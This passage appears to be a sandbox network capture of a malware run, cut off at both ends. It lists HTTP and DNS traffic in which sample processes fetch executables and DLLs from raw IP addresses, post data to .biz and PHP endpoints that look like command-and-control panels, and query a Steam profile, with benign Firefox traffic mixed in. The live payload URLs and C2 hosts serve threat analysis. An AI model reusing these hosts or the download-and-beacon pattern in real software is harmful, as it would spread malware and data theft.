                    Connection: keep-alive
                  • flag-de
                    POST
                    https://ooihu.shop/
                    3EUEYgl.exe
                    Remote address:
                    116.203.10.31:443
                    Request
                    POST / HTTP/1.1
                    Content-Type: multipart/form-data; boundary=----U3WBSRQQ9RQQIECJWLNG
                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                    Host: ooihu.shop
                    Content-Length: 299
                    Connection: Keep-Alive
                    Cache-Control: no-cache
                    Response
                    HTTP/1.1 200 OK
                    Server: nginx
                    Date: Tue, 10 Dec 2024 19:48:57 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                  • flag-ru
                    GET
                    http://185.215.113.16/luma/random.exe
                    skotes.exe
                    Remote address:
                    185.215.113.16:80
                    Request
                    GET /luma/random.exe HTTP/1.1
                    Host: 185.215.113.16
                    Response
                    HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Tue, 10 Dec 2024 19:49:04 GMT
                    Content-Type: application/octet-stream
                    Content-Length: 1847808
                    Last-Modified: Tue, 10 Dec 2024 19:19:40 GMT
                    Connection: keep-alive
                    ETag: "6758944c-1c3200"
                    Accept-Ranges: bytes
                  • flag-ru
                    GET
                    http://185.215.113.16/steam/random.exe
                    skotes.exe
                    Remote address:
                    185.215.113.16:80
                    Request
                    GET /steam/random.exe HTTP/1.1
                    Host: 185.215.113.16
                    Response
                    HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Tue, 10 Dec 2024 19:49:08 GMT
                    Content-Type: application/octet-stream
                    Content-Length: 1772032
                    Last-Modified: Tue, 10 Dec 2024 19:19:47 GMT
                    Connection: keep-alive
                    ETag: "67589453-1b0a00"
                    Accept-Ranges: bytes
                  • flag-ru
                    GET
                    http://185.215.113.16/well/random.exe
                    skotes.exe
                    Remote address:
                    185.215.113.16:80
                    Request
                    GET /well/random.exe HTTP/1.1
                    Host: 185.215.113.16
                    Response
                    HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Tue, 10 Dec 2024 19:49:13 GMT
                    Content-Type: application/octet-stream
                    Content-Length: 971776
                    Last-Modified: Tue, 10 Dec 2024 19:17:52 GMT
                    Connection: keep-alive
                    ETag: "675893e0-ed400"
                    Accept-Ranges: bytes
                  • flag-ru
                    GET
                    http://185.215.113.16/off/random.exe
                    skotes.exe
                    Remote address:
                    185.215.113.16:80
                    Request
                    GET /off/random.exe HTTP/1.1
                    Host: 185.215.113.16
                    Response
                    HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Tue, 10 Dec 2024 19:49:19 GMT
                    Content-Type: application/octet-stream
                    Content-Length: 2714624
                    Last-Modified: Tue, 10 Dec 2024 19:18:18 GMT
                    Connection: keep-alive
                    ETag: "675893fa-296c00"
                    Accept-Ranges: bytes
                  • flag-nl
                    GET
                    http://80.82.65.70/add?substr=mixtwo&s=three&sub=emp
                    f47698ce5b.exe
                    Remote address:
                    80.82.65.70:80
                    Request
                    GET /add?substr=mixtwo&s=three&sub=emp HTTP/1.1
                    Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                    Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                    Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                    Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                    User-Agent: 1
                    Host: 80.82.65.70
                    Connection: Keep-Alive
                    Cache-Control: no-cache
                    Response
                    HTTP/1.1 200 OK
                    Date: Tue, 10 Dec 2024 19:49:06 GMT
                    Server: Apache/2.4.58 (Ubuntu)
                    Content-Length: 1
                    Keep-Alive: timeout=5, max=100
                    Connection: Keep-Alive
                    Content-Type: text/html; charset=UTF-8
                  • flag-nl
                    GET
                    http://80.82.65.70/dll/key
                    f47698ce5b.exe
                    Remote address:
                    80.82.65.70:80
                    Request
                    GET /dll/key HTTP/1.1
                    Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                    Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                    Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                    Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                    User-Agent: 1
                    Host: 80.82.65.70
                    Connection: Keep-Alive
                    Cache-Control: no-cache
                    Response
                    HTTP/1.1 200 OK
                    Date: Tue, 10 Dec 2024 19:49:06 GMT
                    Server: Apache/2.4.58 (Ubuntu)
                    Content-Length: 21
                    Keep-Alive: timeout=5, max=99
                    Connection: Keep-Alive
                    Content-Type: text/html; charset=UTF-8
                  • flag-nl
                    GET
                    http://80.82.65.70/dll/download
                    f47698ce5b.exe
                    Remote address:
                    80.82.65.70:80
                    Request
                    GET /dll/download HTTP/1.1
                    Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                    Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                    Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                    Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                    User-Agent: 1
                    Host: 80.82.65.70
                    Connection: Keep-Alive
                    Cache-Control: no-cache
                    Response
                    HTTP/1.1 200 OK
                    Date: Tue, 10 Dec 2024 19:49:06 GMT
                    Server: Apache/2.4.58 (Ubuntu)
                    Content-Disposition: attachment; filename="fuckingdllENCR.dll";
                    Content-Length: 97296
                    Keep-Alive: timeout=5, max=98
                    Connection: Keep-Alive
                    Content-Type: application/octet-stream
                  • flag-nl
                    GET
                    http://80.82.65.70/files/download
                    f47698ce5b.exe
                    Remote address:
                    80.82.65.70:80
                    Request
                    GET /files/download HTTP/1.1
                    Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                    Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                    Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                    Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                    User-Agent: C
                    Host: 80.82.65.70
                    Connection: Keep-Alive
                    Cache-Control: no-cache
                    Response
                    HTTP/1.1 200 OK
                    Date: Tue, 10 Dec 2024 19:49:07 GMT
                    Server: Apache/2.4.58 (Ubuntu)
                    Content-Length: 1
                    Keep-Alive: timeout=5, max=97
                    Connection: Keep-Alive
                    Content-Type: text/html; charset=UTF-8
                  • flag-nl
                    GET
                    http://80.82.65.70/files/download
                    f47698ce5b.exe
                    Remote address:
                    80.82.65.70:80
                    Request
                    GET /files/download HTTP/1.1
                    Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                    Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                    Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                    Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                    User-Agent: C
                    Host: 80.82.65.70
                    Connection: Keep-Alive
                    Cache-Control: no-cache
                    Response
                    HTTP/1.1 200 OK
                    Date: Tue, 10 Dec 2024 19:49:09 GMT
                    Server: Apache/2.4.58 (Ubuntu)
                    Content-Length: 1
                    Keep-Alive: timeout=5, max=96
                    Connection: Keep-Alive
                    Content-Type: text/html; charset=UTF-8
                  • flag-nl
                    GET
                    http://80.82.65.70/files/download
                    f47698ce5b.exe
                    Remote address:
                    80.82.65.70:80
                    Request
                    GET /files/download HTTP/1.1
                    Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                    Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                    Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                    Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                    User-Agent: C
                    Host: 80.82.65.70
                    Connection: Keep-Alive
                    Cache-Control: no-cache
                    Response
                    HTTP/1.1 200 OK
                    Date: Tue, 10 Dec 2024 19:49:11 GMT
                    Server: Apache/2.4.58 (Ubuntu)
                    Content-Length: 1
                    Keep-Alive: timeout=5, max=95
                    Connection: Keep-Alive
                    Content-Type: text/html; charset=UTF-8
                  • flag-nl
                    GET
                    http://80.82.65.70/files/download
                    f47698ce5b.exe
                    Remote address:
                    80.82.65.70:80
                    Request
                    GET /files/download HTTP/1.1
                    Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                    Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                    Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                    Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                    User-Agent: C
                    Host: 80.82.65.70
                    Connection: Keep-Alive
                    Cache-Control: no-cache
                    Response
                    HTTP/1.1 200 OK
                    Date: Tue, 10 Dec 2024 19:49:13 GMT
                    Server: Apache/2.4.58 (Ubuntu)
                    Content-Length: 1
                    Keep-Alive: timeout=5, max=94
                    Connection: Keep-Alive
                    Content-Type: text/html; charset=UTF-8
                  • flag-nl
                    GET
                    http://80.82.65.70/files/download
                    f47698ce5b.exe
                    Remote address:
                    80.82.65.70:80
                    Request
                    GET /files/download HTTP/1.1
                    Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                    Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                    Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                    Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                    User-Agent: C
                    Host: 80.82.65.70
                    Connection: Keep-Alive
                    Cache-Control: no-cache
                    Response
                    HTTP/1.1 200 OK
                    Date: Tue, 10 Dec 2024 19:49:15 GMT
                    Server: Apache/2.4.58 (Ubuntu)
                    Content-Length: 1
                    Keep-Alive: timeout=5, max=93
                    Connection: Keep-Alive
                    Content-Type: text/html; charset=UTF-8
                  • flag-nl
                    GET
                    http://80.82.65.70/files/download
                    f47698ce5b.exe
                    Remote address:
                    80.82.65.70:80
                    Request
                    GET /files/download HTTP/1.1
                    Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                    Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                    Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                    Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                    User-Agent: C
                    Host: 80.82.65.70
                    Connection: Keep-Alive
                    Cache-Control: no-cache
                    Response
                    HTTP/1.1 200 OK
                    Date: Tue, 10 Dec 2024 19:49:18 GMT
                    Server: Apache/2.4.58 (Ubuntu)
                    Content-Length: 1
                    Keep-Alive: timeout=5, max=92
                    Connection: Keep-Alive
                    Content-Type: text/html; charset=UTF-8
                  • flag-nl
                    GET
                    http://80.82.65.70/files/download
                    f47698ce5b.exe
                    Remote address:
                    80.82.65.70:80
                    Request
                    GET /files/download HTTP/1.1
                    Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                    Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                    Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                    Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                    User-Agent: C
                    Host: 80.82.65.70
                    Connection: Keep-Alive
                    Cache-Control: no-cache
                    Response
                    HTTP/1.1 200 OK
                    Date: Tue, 10 Dec 2024 19:49:20 GMT
                    Server: Apache/2.4.58 (Ubuntu)
                    Content-Length: 1
                    Keep-Alive: timeout=5, max=91
                    Connection: Keep-Alive
                    Content-Type: text/html; charset=UTF-8
                  • flag-nl
                    GET
                    http://80.82.65.70/files/download
                    f47698ce5b.exe
                    Remote address:
                    80.82.65.70:80
                    Request
                    GET /files/download HTTP/1.1
                    Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                    Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                    Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                    Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                    User-Agent: C
                    Host: 80.82.65.70
                    Connection: Keep-Alive
                    Cache-Control: no-cache
                    Response
                    HTTP/1.1 200 OK
                    Date: Tue, 10 Dec 2024 19:49:22 GMT
                    Server: Apache/2.4.58 (Ubuntu)
                    Content-Length: 1
                    Keep-Alive: timeout=5, max=90
                    Connection: Keep-Alive
                    Content-Type: text/html; charset=UTF-8
                  • flag-nl
                    GET
                    http://80.82.65.70/files/download
                    f47698ce5b.exe
                    Remote address:
                    80.82.65.70:80
                    Request
                    GET /files/download HTTP/1.1
                    Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                    Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                    Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                    Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                    User-Agent: C
                    Host: 80.82.65.70
                    Connection: Keep-Alive
                    Cache-Control: no-cache
                    Response
                    HTTP/1.1 200 OK
                    Date: Tue, 10 Dec 2024 19:49:24 GMT
                    Server: Apache/2.4.58 (Ubuntu)
                    Content-Length: 1
                    Keep-Alive: timeout=5, max=89
                    Connection: Keep-Alive
                    Content-Type: text/html; charset=UTF-8
                  • flag-nl
                    GET
                    http://80.82.65.70/files/download
                    f47698ce5b.exe
                    Remote address:
                    80.82.65.70:80
                    Request
                    GET /files/download HTTP/1.1
                    Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                    Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                    Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                    Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                    User-Agent: C
                    Host: 80.82.65.70
                    Connection: Keep-Alive
                    Cache-Control: no-cache
                    Response
                    HTTP/1.1 200 OK
                    Date: Tue, 10 Dec 2024 19:49:27 GMT
                    Server: Apache/2.4.58 (Ubuntu)
                    Content-Length: 1
                    Keep-Alive: timeout=5, max=88
                    Connection: Keep-Alive
                    Content-Type: text/html; charset=UTF-8
                  • flag-nl
                    GET
                    http://80.82.65.70/files/download
                    f47698ce5b.exe
                    Remote address:
                    80.82.65.70:80
                    Request
                    GET /files/download HTTP/1.1
                    Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                    Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                    Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                    Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                    User-Agent: C
                    Host: 80.82.65.70
                    Connection: Keep-Alive
                    Cache-Control: no-cache
                    Response
                    HTTP/1.1 200 OK
                    Date: Tue, 10 Dec 2024 19:49:29 GMT
                    Server: Apache/2.4.58 (Ubuntu)
                    Content-Length: 1
                    Keep-Alive: timeout=5, max=87
                    Connection: Keep-Alive
                    Content-Type: text/html; charset=UTF-8
                  • flag-nl
                    GET
                    http://80.82.65.70/soft/download
                    f47698ce5b.exe
                    Remote address:
                    80.82.65.70:80
                    Request
                    GET /soft/download HTTP/1.1
                    Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                    Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                    Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                    Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                    User-Agent: d
                    Host: 80.82.65.70
                    Connection: Keep-Alive
                    Cache-Control: no-cache
                    Response
                    HTTP/1.1 200 OK
                    Date: Tue, 10 Dec 2024 19:49:32 GMT
                    Server: Apache/2.4.58 (Ubuntu)
                    Content-Disposition: attachment; filename="dll";
                    Content-Length: 242176
                    Keep-Alive: timeout=5, max=86
                    Connection: Keep-Alive
                    Content-Type: application/octet-stream
                  • flag-nl
                    GET
                    http://80.82.65.70/soft/download
                    f47698ce5b.exe
                    Remote address:
                    80.82.65.70:80
                    Request
                    GET /soft/download HTTP/1.1
                    Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                    Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                    Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                    Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                    User-Agent: s
                    Host: 80.82.65.70
                    Connection: Keep-Alive
                    Cache-Control: no-cache
                    Response
                    HTTP/1.1 200 OK
                    Date: Tue, 10 Dec 2024 19:49:34 GMT
                    Server: Apache/2.4.58 (Ubuntu)
                    Content-Disposition: attachment; filename="soft";
                    Content-Length: 1502720
                    Keep-Alive: timeout=5, max=85
                    Connection: Keep-Alive
                    Content-Type: application/octet-stream
                  • flag-us
                    DNS
                    16.113.215.185.in-addr.arpa
                    Remote address:
                    8.8.8.8:53
                    Request
                    16.113.215.185.in-addr.arpa
                    IN PTR
                    Response
                  • flag-us
                    DNS
                    70.65.82.80.in-addr.arpa
                    Remote address:
                    8.8.8.8:53
                    Request
                    70.65.82.80.in-addr.arpa
                    IN PTR
                    Response
                    70.65.82.80.in-addr.arpa
                    IN PTR
                    security criminalipcom
                  • flag-us
                    DNS
                    70.65.82.80.in-addr.arpa
                    Remote address:
                    8.8.8.8:53
                    Request
                    70.65.82.80.in-addr.arpa
                    IN PTR
                    Response
                    70.65.82.80.in-addr.arpa
                    IN PTR
                    security criminalipcom
                  • flag-us
                    POST
                    https://atten-supporse.biz/api
                    f3745b045c.exe
                    Remote address:
                    104.21.96.1:443
                    Request
                    POST /api HTTP/1.1
                    Connection: Keep-Alive
                    Content-Type: application/x-www-form-urlencoded
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                    Content-Length: 8
                    Host: atten-supporse.biz
                    Response
                    HTTP/1.1 200 OK
                    Date: Tue, 10 Dec 2024 19:49:08 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Set-Cookie: PHPSESSID=1rti7gd8m1q38lkot52qn3j6m1; expires=Sat, 05-Apr-2025 13:35:46 GMT; Max-Age=9999999; path=/
                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                    Cache-Control: no-store, no-cache, must-revalidate
                    Pragma: no-cache
                    CF-Cache-Status: DYNAMIC
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MgRo2F1UE1ELIVv9nrAu4EcCO%2BuRG%2F1ZSU3JYq5M0rIX0I0HwGBK6MN7qXXI5kJrn0Ojb48gyHywjs1gQhzZmvvbUkvRW%2FZkqhwwcz1mdwJjqAn1UD%2FlT0X4MvAu3pao7VNqdfY%3D"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 8effc1a3298c7708-LHR
                    alt-svc: h3=":443"; ma=86400
                    server-timing: cfL4;desc="?proto=TCP&rtt=50818&min_rtt=49270&rtt_var=13122&sent=6&recv=7&lost=0&retrans=0&sent_bytes=3304&recv_bytes=609&delivery_rate=74121&cwnd=251&unsent_bytes=0&cid=bdf20502329b77b1&ts=691&x=0"
                  • flag-us
                    DNS
                    se-blurry.biz
                    f3745b045c.exe
                    Remote address:
                    8.8.8.8:53
                    Request
                    se-blurry.biz
                    IN A
                    Response
                  • flag-us
                    DNS
                    se-blurry.biz
                    f3745b045c.exe
                    Remote address:
                    8.8.8.8:53
                    Request
                    se-blurry.biz
                    IN A
                    Response
                  • flag-us
                    DNS
                    zinc-sneark.biz
                    f3745b045c.exe
                    Remote address:
                    8.8.8.8:53
                    Request
                    zinc-sneark.biz
                    IN A
                    Response
                  • flag-us
                    DNS
                    dwell-exclaim.biz
                    f3745b045c.exe
                    Remote address:
                    8.8.8.8:53
                    Request
                    dwell-exclaim.biz
                    IN A
                    Response
                  • flag-us
                    DNS
                    dwell-exclaim.biz
                    f3745b045c.exe
                    Remote address:
                    8.8.8.8:53
                    Request
                    dwell-exclaim.biz
                    IN A
                    Response
                  • flag-us
                    DNS
                    formy-spill.biz
                    f3745b045c.exe
                    Remote address:
                    8.8.8.8:53
                    Request
                    formy-spill.biz
                    IN A
                    Response
                  • flag-us
                    POST
                    https://covery-mover.biz/api
                    f3745b045c.exe
                    Remote address:
                    172.67.206.64:443
                    Request
                    POST /api HTTP/1.1
                    Connection: Keep-Alive
                    Content-Type: application/x-www-form-urlencoded
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                    Content-Length: 8
                    Host: covery-mover.biz
                    Response
                    HTTP/1.1 200 OK
                    Date: Tue, 10 Dec 2024 19:49:08 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Set-Cookie: PHPSESSID=gouc14eom2mq9dd3fl935h95t0; expires=Sat, 05-Apr-2025 13:35:47 GMT; Max-Age=9999999; path=/
                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                    Cache-Control: no-store, no-cache, must-revalidate
                    Pragma: no-cache
                    CF-Cache-Status: DYNAMIC
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=j8RaqumKoVFPmNu6B5rPnX%2FVfXfnaLPoOVugBzI1DTTe7E30dmTPGvuOCI%2FP7Q9Kxav72asEKYbg2H%2Ft%2Fv9IZUgDbv6z0HYDQ8fjqlrv4llPTvnG72%2Fe0aZMQLhgaFecXS4W"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 8effc1a9695f9578-LHR
                    alt-svc: h3=":443"; ma=86400
                    server-timing: cfL4;desc="?proto=TCP&rtt=49191&min_rtt=48642&rtt_var=11217&sent=6&recv=7&lost=0&retrans=0&sent_bytes=3299&recv_bytes=605&delivery_rate=80573&cwnd=253&unsent_bytes=0&cid=5d11782bc21f0d66&ts=228&x=0"
                  • flag-us
                    DNS
                    dare-curbys.biz
                    f3745b045c.exe
                    Remote address:
                    8.8.8.8:53
                    Request
                    dare-curbys.biz
                    IN A
                    Response
                  • flag-us
                    DNS
                    print-vexer.biz
                    f3745b045c.exe
                    Remote address:
                    8.8.8.8:53
                    Request
                    print-vexer.biz
                    IN A
                    Response
                  • flag-us
                    DNS
                    impend-differ.biz
                    f3745b045c.exe
                    Remote address:
                    8.8.8.8:53
                    Request
                    impend-differ.biz
                    IN A
                    Response
                  • flag-us
                    DNS
                    steamcommunity.com
                    f3745b045c.exe
                    Remote address:
                    8.8.8.8:53
                    Request
                    steamcommunity.com
                    IN A
                    Response
                    steamcommunity.com
                    IN A
                    23.214.143.155
                  • flag-us
                    DNS
                    steamcommunity.com
                    f3745b045c.exe
                    Remote address:
                    8.8.8.8:53
                    Request
                    steamcommunity.com
                    IN A
                    Response
                    steamcommunity.com
                    IN A
                    23.214.143.155
                  • flag-gb
                    GET
                    https://steamcommunity.com/profiles/76561199724331900
                    f3745b045c.exe
                    Remote address:
                    23.214.143.155:443
                    Request
                    GET /profiles/76561199724331900 HTTP/1.1
                    Connection: Keep-Alive
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                    Host: steamcommunity.com
                    Response
                    HTTP/1.1 200 OK
                    Server: nginx
                    Content-Type: text/html; charset=UTF-8
                    Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.cloudflare.steamstatic.com/ https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.cloudflare.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/;
                    Expires: Mon, 26 Jul 1997 05:00:00 GMT
                    Cache-Control: no-cache
                    Date: Tue, 10 Dec 2024 19:49:09 GMT
                    Content-Length: 35597
                    Connection: keep-alive
                    Set-Cookie: sessionid=195e56bd7f2e8a34c512c25c; Path=/; Secure; SameSite=None
                    Set-Cookie: steamCountry=GB%7C7d625a3b038bb98f68b4e14dac147806; Path=/; Secure; HttpOnly; SameSite=None
                  • flag-ru
                    GET
                    http://185.215.113.206/
                    0858ba6bc7.exe
                    Remote address:
                    185.215.113.206:80
                    Request
                    GET / HTTP/1.1
                    Host: 185.215.113.206
                    Connection: Keep-Alive
                    Cache-Control: no-cache
                    Response
                    HTTP/1.1 200 OK
                    Date: Tue, 10 Dec 2024 19:49:12 GMT
                    Server: Apache/2.4.41 (Ubuntu)
                    Content-Length: 0
                    Keep-Alive: timeout=5, max=100
                    Connection: Keep-Alive
                    Content-Type: text/html; charset=UTF-8
                  • flag-ru
                    POST
                    http://185.215.113.206/c4becf79229cb002.php
                    0858ba6bc7.exe
                    Remote address:
                    185.215.113.206:80
                    Request
                    POST /c4becf79229cb002.php HTTP/1.1
                    Content-Type: multipart/form-data; boundary=----BGIDBKKKKKFBGDGDHIDB
                    Host: 185.215.113.206
                    Content-Length: 211
                    Connection: Keep-Alive
                    Cache-Control: no-cache
                    Response
                    HTTP/1.1 200 OK
                    Date: Tue, 10 Dec 2024 19:49:12 GMT
                    Server: Apache/2.4.41 (Ubuntu)
                    Content-Length: 8
                    Keep-Alive: timeout=5, max=99
                    Connection: Keep-Alive
                    Content-Type: text/html; charset=UTF-8
                  • flag-us
                    DNS
                    youtube.com
                    firefox.exe
                    Remote address:
                    8.8.8.8:53
                    Request
                    youtube.com
                    IN A
                    Response
                    youtube.com
                    IN A
                    216.58.213.14
                  • flag-us
                    DNS
                    youtube.com
                    firefox.exe
                    Remote address:
                    8.8.8.8:53
                    Request
                    youtube.com
                    IN A
                    Response
                    youtube.com
                    IN A
                    216.58.213.14
                  • flag-us
                    DNS
                    spocs.getpocket.com
                    firefox.exe
                    Remote address:
                    8.8.8.8:53
                    Request
                    spocs.getpocket.com
                    IN A
                    Response
                    spocs.getpocket.com
                    IN CNAME
                    prod.ads.prod.webservices.mozgcp.net
                    prod.ads.prod.webservices.mozgcp.net
                    IN A
                    34.117.188.166
                  • flag-us
                    DNS
                    firefox-api-proxy.cdn.mozilla.net
                    firefox.exe
                    Remote address:
                    8.8.8.8:53
                    Request
                    firefox-api-proxy.cdn.mozilla.net
                    IN A
                    Response
                    firefox-api-proxy.cdn.mozilla.net
                    IN CNAME
                    firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net
                    firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net
                    IN A
                    34.149.97.1
                  • flag-us
                    GET
                    https://firefox-api-proxy.cdn.mozilla.net/desktop/v1/recommendations?locale=en-US&region=GB&count=30
                    firefox.exe
                    Remote address:
                    34.149.97.1:443
                    Request
                    GET /desktop/v1/recommendations?locale=en-US&region=GB&count=30 HTTP/2.0
                    host: firefox-api-proxy.cdn.mozilla.net
                    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
                    accept: */*
                    accept-language: en-US,en;q=0.5
                    accept-encoding: gzip, deflate, br
                    consumer_key: 94110-6d5ff7a89d72c869766af0e0
                    if-none-match: W/"48ad-Wzzv6brE9/8oXtHM28V6BRKWozE"
                    te: trailers
                  • flag-us
                    DNS
                    prod.remote-settings.prod.webservices.mozgcp.net
                    firefox.exe
                    Remote address:
                    8.8.8.8:53
                    Request
                    prod.remote-settings.prod.webservices.mozgcp.net
                    IN A
                    Response
                    prod.remote-settings.prod.webservices.mozgcp.net
                    IN A
                    34.149.100.209
                  • flag-us
                    DNS
                    prod.remote-settings.prod.webservices.mozgcp.net
                    firefox.exe
                    Remote address:
                    8.8.8.8:53
                    Request
                    prod.remote-settings.prod.webservices.mozgcp.net
                    IN A
                  • flag-us
                    DNS
                    firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net
                    firefox.exe
                    Remote address:
                    8.8.8.8:53
                    Request
